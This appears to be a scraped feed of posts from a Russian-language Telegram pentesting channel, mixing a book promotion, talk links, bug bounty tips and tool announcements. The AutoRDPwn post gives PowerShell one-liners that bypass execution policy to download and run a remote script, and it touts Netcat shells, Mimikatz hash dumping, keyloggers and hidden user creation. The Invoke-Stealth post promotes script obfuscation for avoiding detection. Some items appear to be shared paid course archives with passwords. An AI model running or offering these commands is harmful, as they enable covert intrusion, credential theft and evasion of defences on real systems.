Книга Хакерство. Физические атаки с использованием хакерских устройств
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
P.S. предвижу холивары на тему, "где электронная версия?" В ближайшее время её ждать не стоит, т.к. это требование издательства, а не автора.
#book
💬 Канал | 💬 Канал автора книги
Издание: 2023
Язык: русский
Сейчас приехала книга "Хакерство. Физические атаки с использованием хакерских устройств" авторства @s0i37. Он написал целую книгу по физическому пентесту с помощью технических средств, так что её можно считать выжимкой из все его опыта опыта! Кстати книга цветная, так что +10 к читабельности.
В книге описано множество атак, которые могут быть совершены с использованием популярных беспроводных технологий и устройств, собранных самостоятельно из общедоступных недорогих деталей, а также показаны способы защиты от них Одни атаки потребуют физического присутствия, другие могут быть проведены на расстоянии. Многие из них потребуют времени, а некоторые позволяют взломать компьютер за секунду.
Не откладывайте покупку на потом! Тем более цена более чем адекватная, я бы даже сказал не существенная.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤4👾1
Forwarded from KazDevOps
Секреты регулярно просачиваются в конвейеры CI/CD, так как рабочие процессы требуют от разработчиков учетных данных для сторонних ресурсов, с которыми взаимодействует их конвейер.
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
Рассказываем в новой статье, что же делать, чтобы этого не случилось – ротация секретов, управление их привилегиями, анализ логов на наличие чувствительной информации и не только.
#devops #cicd #secretsleak #secrets
@DevOpsKaz
👍10🆒2
Forwarded from AKTIV.CONSULTING
Ознакомиться с рейтингом уязвимостей
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍2🆒2
Quick-tricks
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
Для получения дополнительной информации о команде используйте команду
💬 Канал | 💻 Github
Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix
Установка:
go install github.com/indigo-sadland/quick-tricks@latest
Функционал:quick-tricks [command]
help Справка о любой командеquick Запуск всех быстрых модулей ('recon', 'lfi', 'redirect', 'spoofing' и 'xss')lfi Модуль проверяет наличие конечных точек, уязвимых к Local File Inclusion.rce Модуль пытается эксплуатировать уязвимые компоненты целевого Битрикса.recon Модуль позволяет найти конечные точки страницы входа в систему, раскрыть локальный путь и лицензионный ключ.redirect Модуль проверяет конечные точки, уязвимые к Open Redirect.spoofing Модуль проверяет цель на возможность атаки Content Spoofing.ssrf Модуль позволяет проверить, уязвима ли цель к SSRF.xss Модуль проверяет конечные точки цели, которые потенциально могут быть уязвимы для XSS. (постоянно фолзы, не советую использовать)Для получения дополнительной информации о команде используйте команду
quick-tricks [command] --help
#bitrixPlease open Telegram to view this post
VIEW IN TELEGRAM
❤🔥11👍4
Forwarded from Positive Events
Обещали — публикуем! 👀
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
На нашем YouTube-канале Positive Events можно посмотреть записи выступлений со стенда Positive Technologies на IT-пикнике, который прошел в Коломенском.
• Уязвимости в тренде? Как понять, что вы не дуршлаг. О том, как создавать продукты, делающие компании неуязвимыми к кибератакам
• Как поймать хакера с помощью искусственного интеллекта
• Как устроен мир вокруг нас: реверс-инжиниринг embedded-устройств
• Преступления в open source: расследуем трояны в Python Package Index
• Как (не) потерять годовой бюджет компании из-за одной ошибки в коде
• Пароль: N4GOR5HK3S!D1TKOROL. Что хакерам известно о паролях
• Как заработать на ипотеку, или Вкатываемся в bug bounty
Приятного просмотра! 🍿
#PositiveЭксперты
👍4
Это powershell фреймворк для постэксплуатации, предназначенный в первую очередь для автоматизации Shadow-RDP атаки на компьютеры под управлением Microsoft Windows. Данная уязвимость позволяет удаленному злоумышленнику просматривать сессию своей жертвы без ее ведома и даже управлять удаленно.
Благодаря дополнительным модулям можно получить удаленный shell через Netcat, сдампить хэши с помощью Mimikatz, загрузить удаленный кейлоггер и многое другое. И все это с помощью интуитивно понятного меню.
Эта тулза может использоваться локально, удаленно или для pivoting'а между серверами.
На системе должен быть PowerShell 4.0+
-admin / -noadmin— явное указание прав доступа для запуска атак;
-nogui— отключает загрузку меню и некоторых цветов, дабы гарантировать общую работоспособность;
-lang— выбор языка интерфейса. [English, Spanish, French, German, Italian, Russian or Portuguese];
-option— выбор типа атаки;
-shadow— выбираем следить или контролировать удаленную машину;
-createuser— не обязательный параметр, который позволяет создаст пользователя
AutoRDPwn:AutoRDPwn на атакуемой машине;-noclean- не обязательный параметр, который отключит автоматический откат параметров после окончания атаки
Дефолтый запуск:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Запуск сразу с параметрами:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
#windows #pentest #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8⚡3
Простой и мощный обфускатор скриптов PowerShell. Этот инструмент позволяет автоматизировать процесс обфускации любого сценария, написанного на PowerShell, с помощью различных техник. Вы можете использовать любую из них по отдельности, вместе или все вместе последовательно в среде Windows или Linux.
Обязательно наличие PowerShell 4.0+. Также для полного функционала требуется Python 3.*
Установка:
git clone https://github.com/JoelGMSec/Invoke-Stealth.gitограниченная версия:
powershell iwr -useb https://darkbyte.net/invoke-stealth.php -outfile Invoke-Stealth.ps1
Использование:.\Invoke-Stealth.ps1 -help
.\Invoke-Stealth.ps1 noscript.ps1 -technique ChimeraВ скрипте содержиться 5+1 техник обфускации PowerShell сценариев:
Chameleon: подстановка строк и конкатенация переменныхBetterXencrypt: Сжатие и шифрование с помощью случайных итерацийPyFuscation: Обфускация функций, переменных и параметровReverseB64: Кодирование в base64 и обратное кодирование во избежание обнаруженияPSObfuscation: Преобразование содержимого в байты и кодирование с помощью GzipТакже можно применить все техники сразу на скрипт, но учитывайте, что стабильность скрипта может снижаться из-за большого кол-ва итераций обфускации.
#windows #pentest #powershell
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍3❤2
Forwarded from #bugbountytips
100 (very) short bug bounty rules:
1/ Spend at least 30 minutes on a new target
2/ Look for "No"s
3/ Use Italics Tags in your inputs instead of XSS payloads
4/ Focus on SaaS apps that are multi-tenant
5/ Buy Burp Pro
6/ On a new target go straight to the User Management section
7/ See if inviting an existing user to your org exposes their name
8/ See if inviting an existing user removes them from their own org
9/ If the scope has a wildcard, use subfinder to find subdomains
10/ Run HTTPX on the list of subdomains to narrow down alive targets
11/ On an app you're not familiar with, use it like a normal user first
12/ If the docs say you can't do X, but you can do X then you have a bug
13/ Use match & replace rules to find new endpoints
14/ Budget time into your week specifically for hacking
15/ Give yourself a no-bug time limit. I do 3 hours.
16/ Go back to old dupes and see if you can still reproduce.
17/ Look for "+2" in your reputation log to find dupes that should be now.
18/Ask for help from other hackers
19/ Make your report a conversation, not a sales pitch
20/ Accept & expect that dupes will happen
21/ File & Forget
22/ If an endpoint has "api/v2/", try "api/v1/"
23/ If an endpoint has "api/v2", try removing the "v2" altogether
24/ 6 $1000 Mediums pay more than 1 $5,000 crit. Don't ignore any bugs
25/ Lows are still bugs that should be filed
26/ Be kind to your triager
27/ Say "thank you" when you get a bounty
28/ If an app uses UUIDs, you can still look for IDORs. Just set "AC:H".
29/ If UUID IDORs exist, then look for an endpoint that exposes UUIDs
30/ Pin your success on whether your followed your plan, not if you found bugs
31/ A program that has a lot of hackers doesn't mean there isn't low-hanging fruit
32/ Going deep _will_ payoff
33/ Working with new hackers will payoff in dividends
34/ Don't be jealous
35/ Bug Bounty income isn't consistent. Be okay with peaks & valleys for your own sanity
36/ If you find a bug that's OOS, still ask the customer if they care
37/ There's no end. Enjoy the journey
38/ Have a hobby that's not related to hacking
39/ Have friends that don't hack
40/ Figure out what time of day you hack the best. Late nights aren't for me.
41/ Spend that extra 2 minutes to make your report look/read nice
42/ "Subscribe" to programs that pay well and have good scope
43/ Don't whine on Twitter about a single report. Or at all for that matter.
44/ IDORs and Privilege Escalations are a great place to start
45/ Unmet expectations lead to disappointment
46/ Teach someone else how to hack
47/ Time spent reading/learning is time-well spent
48/ Focus on programs that you actually use in your day-to-day
49/ Establish a relationship with the program
50/ Try asking the program what types of bugs they want to see
#bugbountytips
1/ Spend at least 30 minutes on a new target
2/ Look for "No"s
3/ Use Italics Tags in your inputs instead of XSS payloads
4/ Focus on SaaS apps that are multi-tenant
5/ Buy Burp Pro
6/ On a new target go straight to the User Management section
7/ See if inviting an existing user to your org exposes their name
8/ See if inviting an existing user removes them from their own org
9/ If the scope has a wildcard, use subfinder to find subdomains
10/ Run HTTPX on the list of subdomains to narrow down alive targets
11/ On an app you're not familiar with, use it like a normal user first
12/ If the docs say you can't do X, but you can do X then you have a bug
13/ Use match & replace rules to find new endpoints
14/ Budget time into your week specifically for hacking
15/ Give yourself a no-bug time limit. I do 3 hours.
16/ Go back to old dupes and see if you can still reproduce.
17/ Look for "+2" in your reputation log to find dupes that should be now.
18/Ask for help from other hackers
19/ Make your report a conversation, not a sales pitch
20/ Accept & expect that dupes will happen
21/ File & Forget
22/ If an endpoint has "api/v2/", try "api/v1/"
23/ If an endpoint has "api/v2", try removing the "v2" altogether
24/ 6 $1000 Mediums pay more than 1 $5,000 crit. Don't ignore any bugs
25/ Lows are still bugs that should be filed
26/ Be kind to your triager
27/ Say "thank you" when you get a bounty
28/ If an app uses UUIDs, you can still look for IDORs. Just set "AC:H".
29/ If UUID IDORs exist, then look for an endpoint that exposes UUIDs
30/ Pin your success on whether your followed your plan, not if you found bugs
31/ A program that has a lot of hackers doesn't mean there isn't low-hanging fruit
32/ Going deep _will_ payoff
33/ Working with new hackers will payoff in dividends
34/ Don't be jealous
35/ Bug Bounty income isn't consistent. Be okay with peaks & valleys for your own sanity
36/ If you find a bug that's OOS, still ask the customer if they care
37/ There's no end. Enjoy the journey
38/ Have a hobby that's not related to hacking
39/ Have friends that don't hack
40/ Figure out what time of day you hack the best. Late nights aren't for me.
41/ Spend that extra 2 minutes to make your report look/read nice
42/ "Subscribe" to programs that pay well and have good scope
43/ Don't whine on Twitter about a single report. Or at all for that matter.
44/ IDORs and Privilege Escalations are a great place to start
45/ Unmet expectations lead to disappointment
46/ Teach someone else how to hack
47/ Time spent reading/learning is time-well spent
48/ Focus on programs that you actually use in your day-to-day
49/ Establish a relationship with the program
50/ Try asking the program what types of bugs they want to see
#bugbountytips
Forwarded from #bugbountytips
51/ Look at a programs leaderboard to see who you should collab with
52/ When collaborating, an even bounty split eliminates hassle
53/ Take a break when you stop having fun
54/ At an LHE, start hacking ahead of time
55/ Look for programs that are active in resolving reports
56/ Look for programs that haven't awarded a lot recently
57/ Look for programs that have collaboration enabled
58/ Look for programs that don't list out a bunch of known issues
59/ Look for programs that have a history of adding new scope
60/ Change your strategy if you've gone a while without a finding
61/ If you're on a roll, keep doing what you're doing
62/ But don't let success keep you from evolving/growing
63/ Compare yourself against yourself from last year
64/ Maintain online presence for new opportunities
65/ Be thankful for failure
66/ Read disclosed reports
67/ Focus on one program at a time. Cycle if you get bored.
68/ Don't spray XSS payloads everywhere
69/ If possible, work at a company that has a BBP
70/ Spend bounty money on tools that will generate more bounties
71/ Budget a specific amount of your bounties for fun. And stick to it.
72/ When hacking a store, don't be afraid to make small purchases
73/ Look for changes in JS files to know when there may be new functionality
74/ Look for references to subdomains in a company's GH repos
75/ Look for references to subdomains in employee's GH repos
76/ If the app uses Intercom, try booting it with another email
77/ Look for second-degree IDORs
78/ SSRFs exist when the app makes any external request. Look for these requests.
79/ Look for actuator endpoints
80/ Find hackers that hack differently than you.
81/ Try hacking in a different room of the house
82/ Try hacking at a different location altogether
83/ If you find the same bug on different endpoints, file as different bugs
84/ Try always having some pending bugs in your pipeline
85/ Break your yearly bounty goal into monthly goals
86/ Know when a bounty isn't worth fighting over
87/ Push back gently when a report gets downgraded
88/ Use the leaderboard as motivation, not as comparison
89/ Don't re-invent the wheel when a tool exists
90/ Don't be afraid to build the wheel if the tool doesn't
91/ Try collabing in real time over video chat
92/ Always ask why something works the way it does
93/ When collabing, don't be afraid to be the underperformer
94/ When collabing, don't get salty about being the overperformer
95/ Use mediation, but use it sparingly
96/ Be generous with your earnings
97/ Hack for fun, not for a paycheck
98/ LHEs are a privilege, not an expectation
99/ Programs are your friend, not your adversary. Work with them
100/ The platform is your friend, not your adversary. Work with them
credit by @ArchAngelDDay
#bugbountytips
52/ When collaborating, an even bounty split eliminates hassle
53/ Take a break when you stop having fun
54/ At an LHE, start hacking ahead of time
55/ Look for programs that are active in resolving reports
56/ Look for programs that haven't awarded a lot recently
57/ Look for programs that have collaboration enabled
58/ Look for programs that don't list out a bunch of known issues
59/ Look for programs that have a history of adding new scope
60/ Change your strategy if you've gone a while without a finding
61/ If you're on a roll, keep doing what you're doing
62/ But don't let success keep you from evolving/growing
63/ Compare yourself against yourself from last year
64/ Maintain online presence for new opportunities
65/ Be thankful for failure
66/ Read disclosed reports
67/ Focus on one program at a time. Cycle if you get bored.
68/ Don't spray XSS payloads everywhere
69/ If possible, work at a company that has a BBP
70/ Spend bounty money on tools that will generate more bounties
71/ Budget a specific amount of your bounties for fun. And stick to it.
72/ When hacking a store, don't be afraid to make small purchases
73/ Look for changes in JS files to know when there may be new functionality
74/ Look for references to subdomains in a company's GH repos
75/ Look for references to subdomains in employee's GH repos
76/ If the app uses Intercom, try booting it with another email
77/ Look for second-degree IDORs
78/ SSRFs exist when the app makes any external request. Look for these requests.
79/ Look for actuator endpoints
80/ Find hackers that hack differently than you.
81/ Try hacking in a different room of the house
82/ Try hacking at a different location altogether
83/ If you find the same bug on different endpoints, file as different bugs
84/ Try always having some pending bugs in your pipeline
85/ Break your yearly bounty goal into monthly goals
86/ Know when a bounty isn't worth fighting over
87/ Push back gently when a report gets downgraded
88/ Use the leaderboard as motivation, not as comparison
89/ Don't re-invent the wheel when a tool exists
90/ Don't be afraid to build the wheel if the tool doesn't
91/ Try collabing in real time over video chat
92/ Always ask why something works the way it does
93/ When collabing, don't be afraid to be the underperformer
94/ When collabing, don't get salty about being the overperformer
95/ Use mediation, but use it sparingly
96/ Be generous with your earnings
97/ Hack for fun, not for a paycheck
98/ LHEs are a privilege, not an expectation
99/ Programs are your friend, not your adversary. Work with them
100/ The platform is your friend, not your adversary. Work with them
credit by @ArchAngelDDay
#bugbountytips
👍4
При атаке Pastejacking, злоумышленник использует JavaScript и другие инструменты для слежки и изменения содержимого буфера обмена. Когда вы копируете текст со страницы, злоумышленник может подменить его данными по своему усмотрению.
#phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤1
1. SaaS, IaaS, PaaS: что это такое, что для чего нужно и как оно работает вместе взятым.
2. Этапы переноса: от планирования и выбора подходящего провайдера до реализации и поддержки.
3. Риски: на что следует обратить внимание, прежде чем делать решительный шаг в облако.
4. Регуляторы: Что думают регуляторы про облачную инфраструктуру, какие есть требования и не являются ли они стоп-фактором.
5. Выгода: А выгодно ли вообще все эти ваши облака?
Даже если вы только начинаете разбираться в облачных технологиях, этот подкаст даст вам четкое понимание преимуществ, рисков и возможностей, которые предоставляет облако для вашего бизнеса.
#облака #подкаст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡4🔥1
Forwarded from Punt4n0
Windows Privilege Escalation for OSCP Beyond.zip
556.1 MB
Pass: WithLove2023
Linux Privilege Escalation For OSCP & Beyond.zip
1.8 GB
Pass: WithLove2023
🔥7⚡1 1